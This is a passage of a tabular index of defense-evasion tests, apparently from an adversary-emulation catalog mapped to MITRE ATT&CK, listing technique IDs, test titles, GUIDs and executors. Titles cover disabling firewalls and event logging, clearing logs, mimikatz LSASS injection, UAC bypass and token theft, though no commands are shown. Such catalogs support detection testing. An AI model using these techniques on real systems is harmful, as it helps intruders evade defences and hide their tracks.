149 defense-evasion T1070.008 Email Collection: Mailbox Manipulation 6 Copy and Modify Mailbox Data on macOS 8a0b1579-5a36-483a-9cde-0236983e1665 bash
150 defense-evasion T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
151 defense-evasion T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
152 defense-evasion T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
153 defense-evasion T1218 Signed Binary Proxy Execution 1 mavinject - Inject DLL into running process c426dacf-575d-4937-8611-a148a86a5e61 command_prompt
154 defense-evasion T1218 Signed Binary Proxy Execution 2 Register-CimProvider - Execute evil dll ad2c17ed-f626-4061-b21e-b9804a6f3655 command_prompt
155 defense-evasion T1218 Signed Binary Proxy Execution 3 InfDefaultInstall.exe .inf Execution 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef command_prompt
156 defense-evasion T1218 Signed Binary Proxy Execution 4 ProtocolHandler.exe Downloaded a Suspicious File db020456-125b-4c8b-a4a7-487df8afb5a2 command_prompt
157 defense-evasion T1218 Signed Binary Proxy Execution 5 Microsoft.Workflow.Compiler.exe Payload Execution 7cbb0f26-a4c1-4f77-b180-a009aa05637e powershell
158 defense-evasion T1218 Signed Binary Proxy Execution 6 Renamed Microsoft.Workflow.Compiler.exe Payload Executions 4cc40fd7-87b8-4b16-b2d7-57534b86b911 powershell
159 defense-evasion T1218 Signed Binary Proxy Execution 7 Invoke-ATHRemoteFXvGPUDisablementCommand base test 9ebe7901-7edf-45c0-b5c7-8366300919db powershell
160 defense-evasion T1218 Signed Binary Proxy Execution 8 DiskShadow Command Execution 0e1483ba-8f0c-425d-b8c6-42736e058eaa powershell
161 defense-evasion T1218 Signed Binary Proxy Execution 9 Load Arbitrary DLL via Wuauclt (Windows Update Client) 49fbd548-49e9-4bb7-94a6-3769613912b8 command_prompt
162 defense-evasion T1218 Signed Binary Proxy Execution 10 Lolbin Gpscript logon option 5bcda9cd-8e85-48fa-861d-b5a85d91d48c command_prompt
163 defense-evasion T1218 Signed Binary Proxy Execution 11 Lolbin Gpscript startup option f8da74bb-21b8-4af9-8d84-f2c8e4a220e3 command_prompt
164 defense-evasion T1218 Signed Binary Proxy Execution 12 Lolbas ie4uinit.exe use as proxy 13c0804e-615e-43ad-b223-2dfbacd0b0b3 command_prompt
165 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 1 Set a file's access timestamp 5f9113d5-ed75-47ed-ba23-ea3573d05810 sh
166 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 2 Set a file's modification timestamp 20ef1523-8758-4898-b5a2-d026cc3d2c52 sh
167 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 3 Set a file's creation timestamp 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b sh
168 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 4 Modify file timestamps using reference file 631ea661-d661-44b0-abdb-7a7f3fc08e50 sh
169 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 5 Windows - Modify file creation timestamp with PowerShell b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c powershell
170 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 6 Windows - Modify file last modified timestamp with PowerShell f8f6634d-93e1-4238-8510-f8a90a20dcf2 powershell
171 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 7 Windows - Modify file last access timestamp with PowerShell da627f63-b9bd-4431-b6f8-c5b44d061a62 powershell
172 defense-evasion T1070.006 Indicator Removal on Host: Timestomp 8 Windows - Timestomp a File d7512c33-3a75-4806-9893-69abc3ccdd43 powershell
173 defense-evasion T1620 Reflective Code Loading 1 WinPwn - Reflectively load Mimik@tz into memory 56b9589c-9170-4682-8c3d-33b86ecb5119 powershell
174 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 1 CMSTP Executing Remote Scriptlet 34e63321-9683-496b-bbc1-7566bc55e624 command_prompt
175 defense-evasion T1218.003 Signed Binary Proxy Execution: CMSTP 2 CMSTP Executing UAC Bypass 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 command_prompt
176 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 1 Disable Windows IIS HTTP Logging 69435dcf-c66f-4ec0-a8b1-82beb76b34db powershell
177 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 2 Disable Windows IIS HTTP Logging via PowerShell a957fb0f-1e85-49b2-a211-413366784b1e powershell
178 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 3 Kill Event Log Service Threads 41ac52ba-5d5e-40c0-b267-573ed90489bd powershell
179 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 4 Impair Windows Audit Log Policy 5102a3a7-e2d7-4129-9e45-f483f2e0eea8 command_prompt
180 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 5 Clear Windows Audit Policy Config 913c0e4e-4b37-4b78-ad0b-90e7b25010f6 command_prompt
181 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 6 Disable Event Logging with wevtutil b26a3340-dad7-4360-9176-706269c74103 command_prompt
182 defense-evasion T1562.002 Impair Defenses: Disable Windows Event Logging 7 Makes Eventlog blind with Phant0m 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741 command_prompt
183 defense-evasion T1218.002 Signed Binary Proxy Execution: Control Panel 1 Control Panel Items 037e9d8a-9e46-4255-8b33-2ae3b545ca6f command_prompt
184 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 1 Disable Microsoft Defender Firewall 88d05800-a5e4-407e-9b53-ece4174f197f command_prompt
185 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 2 Disable Microsoft Defender Firewall via Registry afedc8c4-038c-4d82-b3e5-623a95f8a612 command_prompt
186 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 3 Allow SMB and RDP on Microsoft Defender Firewall d9841bf8-f161-4c73-81e9-fd773a5ff8c1 command_prompt
187 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 4 Opening ports for proxy - HARDRAIN 15e57006-79dd-46df-9bf9-31bc24fb5a80 command_prompt
188 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 5 Open a local port through Windows Firewall to any profile 9636dd6e-7599-40d2-8eee-ac16434f35ed powershell
189 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 6 Allow Executable Through Firewall Located in Non-Standard Location 6f5822d2-d38d-4f48-9bfc-916607ff6b8c powershell
190 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 7 Stop/Start UFW firewall fe135572-edcd-49a2-afe6-1d39521c5a9a sh
191 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 8 Stop/Start UFW firewall systemctl 9fd99609-1854-4f3c-b47b-97d9a5972bd1 sh
192 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 9 Turn off UFW logging 8a95b832-2c2a-494d-9cb0-dc9dd97c8bad sh
193 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 10 Add and delete UFW firewall rules b2563a4e-c4b8-429c-8d47-d5bcb227ba7a sh
194 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 11 Edit UFW firewall user.rules file beaf815a-c883-4194-97e9-fdbbb2bbdd7c sh
195 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 12 Edit UFW firewall ufw.conf file c1d8c4eb-88da-4927-ae97-c7c25893803b sh
196 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 13 Edit UFW firewall sysctl.conf file c4ae0701-88d3-4cd8-8bce-4801ed9f97e4 sh
197 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 14 Edit UFW firewall main configuration file 7b697ece-8270-46b5-bbc7-6b9e27081831 sh
198 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 15 Tail the UFW firewall log file 419cca0c-fa52-4572-b0d7-bc7c6f388a27 sh
199 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 16 Disable iptables 7784c64e-ed0b-4b65-bf63-c86db229fd56 sh
200 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 17 Modify/delete iptables firewall rules 899a7fb5-d197-4951-8614-f19ac4a73ad4 sh
201 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 18 LockBit Black - Unusual Windows firewall registry modification -cmd a4651931-ebbb-4cde-9363-ddf3d66214cb command_prompt
202 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 19 LockBit Black - Unusual Windows firewall registry modification -Powershell 80b453d1-eec5-4144-bf08-613a6c3ffe12 powershell
203 defense-evasion T1562.004 Impair Defenses: Disable or Modify System Firewall 20 Blackbit - Disable Windows Firewall using netsh firewall 91f348e6-3760-4997-a93b-2ceee7f254ee command_prompt
204 defense-evasion T1207 Rogue Domain Controller 1 DCShadow (Active Directory) 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6 powershell
205 defense-evasion T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
206 defense-evasion T1112 Modify Registry 1 Modify Registry of Current User Profile - cmd 1324796b-d0f6-455a-b4ae-21ffee6aa6b9 command_prompt
207 defense-evasion T1112 Modify Registry 2 Modify Registry of Local Machine - cmd 282f929a-6bc5-42b8-bd93-960c3ba35afe command_prompt
208 defense-evasion T1112 Modify Registry 3 Modify registry to store logon credentials c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 command_prompt
209 defense-evasion T1112 Modify Registry 4 Add domain to Trusted sites Zone cf447677-5a4e-4937-a82c-e47d254afd57 powershell
210 defense-evasion T1112 Modify Registry 5 Javascript in registry 15f44ea9-4571-4837-be9e-802431a7bfae powershell
211 defense-evasion T1112 Modify Registry 6 Change Powershell Execution Policy to Bypass f3a6cceb-06c9-48e5-8df8-8867a6814245 powershell
212 defense-evasion T1112 Modify Registry 7 BlackByte Ransomware Registry Changes - CMD 4f4e2f9f-6209-4fcf-9b15-3b7455706f5b command_prompt
213 defense-evasion T1112 Modify Registry 8 BlackByte Ransomware Registry Changes - Powershell 0b79c06f-c788-44a2-8630-d69051f1123d powershell
214 defense-evasion T1112 Modify Registry 9 Disable Windows Registry Tool ac34b0f7-0f85-4ac0-b93e-3ced2bc69bb8 command_prompt
215 defense-evasion T1112 Modify Registry 10 Disable Windows CMD application d2561a6d-72bd-408c-b150-13efe1801c2a powershell
216 defense-evasion T1112 Modify Registry 11 Disable Windows Task Manager application af254e70-dd0e-4de6-9afe-a994d9ea8b62 command_prompt
217 defense-evasion T1112 Modify Registry 12 Disable Windows Notification Center c0d6d67f-1f63-42cc-95c0-5fd6b20082ad command_prompt
218 defense-evasion T1112 Modify Registry 13 Disable Windows Shutdown Button 6e0d1131-2d7e-4905-8ca5-d6172f05d03d command_prompt
219 defense-evasion T1112 Modify Registry 14 Disable Windows LogOff Button e246578a-c24d-46a7-9237-0213ff86fb0c command_prompt
220 defense-evasion T1112 Modify Registry 15 Disable Windows Change Password Feature d4a6da40-618f-454d-9a9e-26af552aaeb0 command_prompt
221 defense-evasion T1112 Modify Registry 16 Disable Windows Lock Workstation Feature 3dacb0d2-46ee-4c27-ac1b-f9886bf91a56 command_prompt
222 defense-evasion T1112 Modify Registry 17 Activate Windows NoDesktop Group Policy Feature 93386d41-525c-4a1b-8235-134a628dee17 command_prompt
223 defense-evasion T1112 Modify Registry 18 Activate Windows NoRun Group Policy Feature d49ff3cc-8168-4123-b5b3-f057d9abbd55 command_prompt
224 defense-evasion T1112 Modify Registry 19 Activate Windows NoFind Group Policy Feature ffbb407e-7f1d-4c95-b22e-548169db1fbd command_prompt
225 defense-evasion T1112 Modify Registry 20 Activate Windows NoControlPanel Group Policy Feature a450e469-ba54-4de1-9deb-9023a6111690 command_prompt
226 defense-evasion T1112 Modify Registry 21 Activate Windows NoFileMenu Group Policy Feature 5e27bdb4-7fd9-455d-a2b5-4b4b22c9dea4 command_prompt
227 defense-evasion T1112 Modify Registry 22 Activate Windows NoClose Group Policy Feature 12f50e15-dbc6-478b-a801-a746e8ba1723 command_prompt
228 defense-evasion T1112 Modify Registry 23 Activate Windows NoSetTaskbar Group Policy Feature d29b7faf-7355-4036-9ed3-719bd17951ed command_prompt
229 defense-evasion T1112 Modify Registry 24 Activate Windows NoTrayContextMenu Group Policy Feature 4d72d4b1-fa7b-4374-b423-0fe326da49d2 command_prompt
230 defense-evasion T1112 Modify Registry 25 Activate Windows NoPropertiesMyDocuments Group Policy Feature 20fc9daa-bd48-4325-9aff-81b967a84b1d command_prompt
231 defense-evasion T1112 Modify Registry 26 Hide Windows Clock Group Policy Feature 8023db1e-ad06-4966-934b-b6a0ae52689e command_prompt
232 defense-evasion T1112 Modify Registry 27 Windows HideSCAHealth Group Policy Feature a4637291-40b1-4a96-8c82-b28f1d73e54e command_prompt
233 defense-evasion T1112 Modify Registry 28 Windows HideSCANetwork Group Policy Feature 3e757ce7-eca0-411a-9583-1c33b8508d52 command_prompt
234 defense-evasion T1112 Modify Registry 29 Windows HideSCAPower Group Policy Feature 8d85a5d8-702f-436f-bc78-fcd9119496fc command_prompt
235 defense-evasion T1112 Modify Registry 30 Windows HideSCAVolume Group Policy Feature 7f037590-b4c6-4f13-b3cc-e424c5ab8ade command_prompt
236 defense-evasion T1112 Modify Registry 31 Windows Modify Show Compress Color And Info Tip Registry 795d3248-0394-4d4d-8e86-4e8df2a2693f command_prompt
237 defense-evasion T1112 Modify Registry 32 Windows Powershell Logging Disabled 95b25212-91a7-42ff-9613-124aca6845a8 command_prompt
238 defense-evasion T1112 Modify Registry 33 Windows Add Registry Value to Load Service in Safe Mode without Network 1dd59fb3-1cb3-4828-805d-cf80b4c3bbb5 command_prompt
239 defense-evasion T1112 Modify Registry 34 Windows Add Registry Value to Load Service in Safe Mode with Network c173c948-65e5-499c-afbe-433722ed5bd4 command_prompt
240 defense-evasion T1112 Modify Registry 35 Disable Windows Toast Notifications 003f466a-6010-4b15-803a-cbb478a314d7 command_prompt
241 defense-evasion T1112 Modify Registry 36 Disable Windows Security Center Notifications 45914594-8df6-4ea9-b3cc-7eb9321a807e command_prompt
242 defense-evasion T1112 Modify Registry 37 Suppress Win Defender Notifications c30dada3-7777-4590-b970-dc890b8cf113 command_prompt
243 defense-evasion T1112 Modify Registry 38 Allow RDP Remote Assistance Feature 86677d0e-0b5e-4a2b-b302-454175f9aa9e command_prompt
244 defense-evasion T1112 Modify Registry 39 NetWire RAT Registry Key Creation 65704cd4-6e36-4b90-b6c1-dc29a82c8e56 command_prompt
245 defense-evasion T1112 Modify Registry 40 Ursnif Malware Registry Key Creation c375558d-7c25-45e9-bd64-7b23a97c1db0 command_prompt
246 defense-evasion T1112 Modify Registry 41 Terminal Server Client Connection History Cleared 3448824b-3c35-4a9e-a8f5-f887f68bea21 command_prompt
247 defense-evasion T1112 Modify Registry 42 Disable Windows Error Reporting Settings d2c9e41e-cd86-473d-980d-b6403562e3e1 command_prompt
248 defense-evasion T1112 Modify Registry 43 DisallowRun Execution Of Certain Applications 71db768a-5a9c-4047-b5e7-59e01f188e84 command_prompt
249 defense-evasion T1112 Modify Registry 44 Enabling Restricted Admin Mode via Command_Prompt fe7974e5-5813-477b-a7bd-311d4f535e83 command_prompt
250 defense-evasion T1112 Modify Registry 45 Mimic Ransomware - Enable Multiple User Sessions 39f1f378-ba8a-42b3-96dc-2a6540cfc1e3 command_prompt
251 defense-evasion T1112 Modify Registry 46 Mimic Ransomware - Allow Multiple RDP Sessions per User 35727d9e-7a7f-4d0c-a259-dc3906d6e8b9 command_prompt
252 defense-evasion T1112 Modify Registry 47 Event Viewer Registry Modification - Redirection URL 6174be7f-5153-4afd-92c5-e0c3b7cdb5ae command_prompt
253 defense-evasion T1112 Modify Registry 48 Event Viewer Registry Modification - Redirection Program 81483501-b8a5-4225-8b32-52128e2f69db command_prompt
254 defense-evasion T1112 Modify Registry 49 Enabling Remote Desktop Protocol via Remote Registry e3ad8e83-3089-49ff-817f-e52f8c948090 command_prompt
255 defense-evasion T1112 Modify Registry 50 Disable Win Defender Notification 12e03af7-79f9-4f95-af48-d3f12f28a260 command_prompt
256 defense-evasion T1112 Modify Registry 51 Disable Windows OS Auto Update 01b20ca8-c7a3-4d86-af59-059f15ed5474 command_prompt
257 defense-evasion T1112 Modify Registry 52 Disable Windows Auto Reboot for current logon user 396f997b-c5f8-4a96-bb2c-3c8795cf459d command_prompt
258 defense-evasion T1112 Modify Registry 53 Windows Auto Update Option to Notify before download 335a6b15-b8d2-4a3f-a973-ad69aa2620d7 command_prompt
259 defense-evasion T1112 Modify Registry 54 Do Not Connect To Win Update d1de3767-99c2-4c6c-8c5a-4ba4586474c8 command_prompt
260 defense-evasion T1112 Modify Registry 55 Tamper Win Defender Protection 3b625eaa-c10d-4635-af96-3eae7d2a2f3c command_prompt
261 defense-evasion T1112 Modify Registry 56 Snake Malware Registry Blob 8318ad20-0488-4a64-98f4-72525a012f6b powershell
262 defense-evasion T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
263 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 1 Pad Binary to Change Hash - Linux/macOS dd ffe2346c-abd5-4b45-a713-bf5f1ebd573a sh
264 defense-evasion T1027.001 Obfuscated Files or Information: Binary Padding 2 Pad Binary to Change Hash using truncate command - Linux/macOS e22a9e89-69c7-410f-a473-e6c212cd2292 sh
265 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
266 defense-evasion T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
267 defense-evasion T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
268 defense-evasion T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
269 defense-evasion T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
270 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
271 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
272 defense-evasion T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
273 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 1 Clear Logs e6abb60e-26b8-41da-8aae-0c35174b0967 command_prompt
274 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 2 Delete System Logs Using Clear-EventLog b13e9306-3351-4b4b-a6e8-477358b0b498 powershell
275 defense-evasion T1070.001 Indicator Removal on Host: Clear Windows Event Logs 3 Clear Event Logs via VBA 1b682d84-f075-4f93-9a89-8a8de19ffd6e powershell
276 defense-evasion T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
277 defense-evasion T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
278 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
279 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
280 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
281 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
282 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
283 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
284 defense-evasion T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
285 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 1 Odbcconf.exe - Execute Arbitrary DLL 2430498b-06c0-4b92-a448-8ad263c388e2 command_prompt
286 defense-evasion T1218.008 Signed Binary Proxy Execution: Odbcconf 2 Odbcconf.exe - Load Response File 331ce274-f9c9-440b-9f8c-a1006e1fce0b command_prompt
287 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 1 Auditing Configuration Changes on Linux Host 212cfbcf-4770-4980-bc21-303e37abd0e3 bash
288 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 2 Logging Configuration Changes on Linux Host 7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c bash
289 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 3 Disable Powershell ETW Provider - Windows 6f118276-121d-4c09-bb58-a8fb4a72ee84 powershell
290 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 4 Disable .NET Event Tracing for Windows Via Registry (cmd) 8a4c33be-a0d3-434a-bee6-315405edbd5b command_prompt
291 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 5 Disable .NET Event Tracing for Windows Via Registry (powershell) 19c07a45-452d-4620-90ed-4c34fffbe758 powershell
292 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 6 LockBit Black - Disable the ETW Provider of Windows Defender -cmd f6df0b8e-2c83-44c7-ba5e-0fa4386bec41 command_prompt
293 defense-evasion T1562.006 Impair Defenses: Indicator Blocking 7 LockBit Black - Disable the ETW Provider of Windows Defender -Powershell 69fc085b-5444-4879-8002-b24c8e1a3e02 powershell
294 defense-evasion T1070 Indicator Removal on Host 1 Indicator Removal using FSUtil b4115c7a-0e92-47f0-a61e-17e7218b2435 command_prompt
295 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
296 defense-evasion T1550.003 Use Alternate Authentication Material: Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
297 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 1 Creating W32Time similar named service using schtasks f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9 command_prompt
298 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 2 Creating W32Time similar named service using sc b721c6ef-472c-4263-a0d9-37f1f4ecff66 command_prompt
299 defense-evasion T1036.004 Masquerading: Masquerade Task or Service 3 linux rename /proc/pid/comm using prctl f0e3aaea-5cd9-4db6-a077-631dd19b27a8 sh
300 defense-evasion T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
301 defense-evasion T1647 Plist File Modification 1 Plist Modification 394a538e-09bb-4a4a-95d1-b93cf12682a8 manual
302 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 1 Mount ISO image 002cca30-4778-4891-878a-aaffcfa502fa powershell
303 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 2 Mount an ISO image and run executable from the ISO 42f22b00-0242-4afc-a61b-0da05041f9cc powershell
304 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 3 Remove the Zone.Identifier alternate data stream 64b12afc-18b8-4d3f-9eab-7f6cae7c73f9 powershell
305 defense-evasion T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass 4 Execute LNK file from ISO c2587b8d-743d-4985-aa50-c83394eaeb68 powershell
306 defense-evasion T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh
307 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 1 Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject 1483fab9-4f52-4217-a9ce-daa9d7747cae command_prompt
308 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 2 Mshta executes VBScript to execute malicious command 906865c3-e05f-4acc-85c4-fbc185455095 command_prompt
309 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 3 Mshta Executes Remote HTML Application (HTA) c4b97eeb-5249-4455-a607-59f95485cb45 powershell
310 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 4 Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement 007e5672-2088-4853-a562-7490ddc19447 powershell
311 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 5 Invoke HTML Application - Jscript Engine Simulating Double Click 58a193ec-131b-404e-b1ca-b35cf0b18c33 powershell
312 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 6 Invoke HTML Application - Direct download from URI 39ceed55-f653-48ac-bd19-aceceaf525db powershell
313 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 7 Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler e7e3a525-7612-4d68-a5d3-c4649181b8af powershell
314 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 8 Invoke HTML Application - JScript Engine with Inline Protocol Handler d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 powershell
315 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 9 Invoke HTML Application - Simulate Lateral Movement over UNC Path b8a8bdb2-7eae-490d-8251-d5e0295b2362 powershell
316 defense-evasion T1218.005 Signed Binary Proxy Execution: Mshta 10 Mshta used to Execute PowerShell 8707a805-2b76-4f32-b1c0-14e558205772 command_prompt
317 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
318 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
319 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
320 defense-evasion T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
321 defense-evasion T1564.002 Hide Artifacts: Hidden Users 1 Create Hidden User using UniqueID < 500 4238a7f0-a980-4fff-98a2-dfc0a363d507 sh
322 defense-evasion T1564.002 Hide Artifacts: Hidden Users 2 Create Hidden User using IsHidden option de87ed7b-52c3-43fd-9554-730f695e7f31 sh
323 defense-evasion T1564.002 Hide Artifacts: Hidden Users 3 Create Hidden User in Registry 173126b7-afe4-45eb-8680-fa9f6400431c command_prompt
324 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 1 Disable history collection 4eafdb45-0f79-4d66-aa86-a3e2c08791f5 sh
325 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 2 Mac HISTCONTROL 468566d5-83e5-40c1-b338-511e1659628d manual
326 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 3 Clear bash history 878794f7-c511-4199-a950-8c28b3ed8e5b bash
327 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 4 Setting the HISTCONTROL environment variable 10ab786a-028e-4465-96f6-9e83ca6c5f24 bash
328 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 5 Setting the HISTFILESIZE environment variable 5cafd6c1-2f43-46eb-ac47-a5301ba0a618 bash
329 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 6 Setting the HISTFILE environment variable b3dacb6c-a9e3-44ec-bf87-38db60c5cad1 bash
330 defense-evasion T1562.003 Impair Defenses: HISTCONTROL 7 Setting the HISTIGNORE environment variable f12acddb-7502-4ce6-a146-5b62c59592f1 bash
331 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
332 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
333 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
334 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
335 defense-evasion T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
336 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 1 Compiled HTML Help Local Payload 5cb87818-0d7c-4469-b7ef-9224107aebe8 command_prompt
337 defense-evasion T1218.001 Signed Binary Proxy Execution: Compiled HTML File 2 Compiled HTML Help Remote Payload 0f8af516-9818-4172-922b-42986ef1e81d command_prompt
